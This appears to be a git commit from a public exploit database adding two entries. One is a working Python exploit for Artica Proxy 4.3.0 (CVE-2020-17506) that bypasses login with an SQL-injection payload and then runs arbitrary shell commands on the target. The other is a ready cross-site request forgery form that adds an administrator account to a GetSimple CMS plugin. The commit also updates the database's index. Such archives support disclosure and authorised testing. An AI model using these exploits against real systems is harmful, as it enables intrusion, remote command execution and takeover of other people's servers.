DB: 2020-08-14
2 changes to exploits/shellcodes Artica Proxy 4.3.0 - Authentication Bypass GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)
This commit is contained in:
Offensive Security
parent
a999edcbb6
commit
e3b25a25ca
3 changed files with 87 additions and 0 deletions
52
exploits/hardware/webapps/48744.py
Executable file
52
exploits/hardware/webapps/48744.py
Executable file
|
|
@ -0,0 +1,52 @@
|
|||
# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-08-13
|
||||
# Exploit Author: Dan Duffy
|
||||
# Vendor Homepage: http://articatech.net/
|
||||
# Software Link: http://articatech.net/download2x.php?IsoOnly=yes
|
||||
# Version: 4.30.00000000 (REQUIRED)
|
||||
# Tested on: Debian
|
||||
# CVE : CVE-2020-17506
|
||||
|
||||
import requests
|
||||
import argparse
|
||||
from bs4 import BeautifulSoup
|
||||
|
||||
|
||||
def bypass_auth(session, args):
|
||||
login_endpoint = "/fw.login.php?apikey="
|
||||
payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
|
||||
|
||||
print("[+] Bypassing authentication...")
|
||||
session.get(args.host + login_endpoint + payload, verify=False)
|
||||
|
||||
return session
|
||||
|
||||
|
||||
def run_command(session, args):
|
||||
cmd_endpoint = "/cyrus.index.php?service-cmds-peform=||{}||".format(args.command)
|
||||
print("[+] Running command: {}".format(args.command))
|
||||
response = session.post(args.host + cmd_endpoint, verify=False)
|
||||
soup = BeautifulSoup(response.text, "html.parser")
|
||||
print(soup.find_all("code")[1].get_text())
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.")
|
||||
parser.add_argument(
|
||||
"--host", help="The host to target. Format example: https://host:port",
|
||||
)
|
||||
parser.add_argument("--command", help="The command to run")
|
||||
|
||||
args = parser.parse_args()
|
||||
if not args.host or not args.command:
|
||||
parser.print_help()
|
||||
exit(0)
|
||||
session = requests.Session()
|
||||
session = bypass_auth(session, args)
|
||||
|
||||
run_command(session, args)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
33
exploits/php/webapps/48745.txt
Normal file
33
exploits/php/webapps/48745.txt
Normal file
|
|
@ -0,0 +1,33 @@
|
|||
# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Add Admin)
|
||||
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
|
||||
# Date: August 2020-08-12
|
||||
# Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/
|
||||
# Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip
|
||||
# Version: 1.8.2
|
||||
# Tested On: Windows 10 Pro + XAMPP
|
||||
# CWE-352: Cross-Site Request Forgery (CSRF)
|
||||
# Vulnerability Description:
|
||||
# Cross-Site Request Forgery (CSRF) vulnerability in Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to add an Admin user via authenticated admin visiting a third-party site.
|
||||
|
||||
## Usage:
|
||||
+ Change <IP||DOMAIN> to target IP address or domain name
|
||||
+ Change <ADMIN> to target username
|
||||
+ Change <PASSWORD> to target password
|
||||
|
||||
## CSRF POST Form Method
|
||||
<html>
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="http://<IP||DOMAIN>/admin/load.php?id=user-managment" method="POST">
|
||||
<input type="hidden" name="usernamec" value="<ADMIN>" />
|
||||
<input type="hidden" name="useremail" value="ADMIN@DOMAIN.LOCAL" />
|
||||
<input type="hidden" name="ntimezone" value="" />
|
||||
<input type="hidden" name="userlng" value="en_US" />
|
||||
<input type="hidden" name="userpassword" value="<PASSWORD>" />
|
||||
<input type="hidden" name="usereditor" value="1" />
|
||||
<input type="hidden" name="Landing" value="" />
|
||||
<input type="hidden" name="add-user" value="Add New User" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
|
@ -42985,3 +42985,5 @@ id,file,description,date,author,type,platform,port
|
|||
48741,exploits/php/webapps/48741.txt,"Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)",2020-08-11,"Roel van Beurden",webapps,php,
|
||||
48742,exploits/php/webapps/48742.txt,"CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload",2020-08-12,"Roel van Beurden",webapps,php,
|
||||
48743,exploits/php/webapps/48743.txt,"vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution",2020-08-12,zenofex,webapps,php,
|
||||
48744,exploits/hardware/webapps/48744.py,"Artica Proxy 4.3.0 - Authentication Bypass",2020-08-13,"Dan Duffy",webapps,hardware,
|
||||
48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue